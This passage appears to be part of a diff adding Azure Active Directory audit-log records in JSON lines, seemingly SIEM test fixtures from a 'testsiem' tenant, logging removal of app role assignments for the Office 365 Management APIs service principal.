"asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464434"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "d8a2ae24-a752-4f8e-adca-c57189a76a71"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "ac045271-8d7f-49b2-abc9-5130051d879f"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:06.3062012Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38464425"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "7f09b681-251f-4ff0-97cf-5247891b6981"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 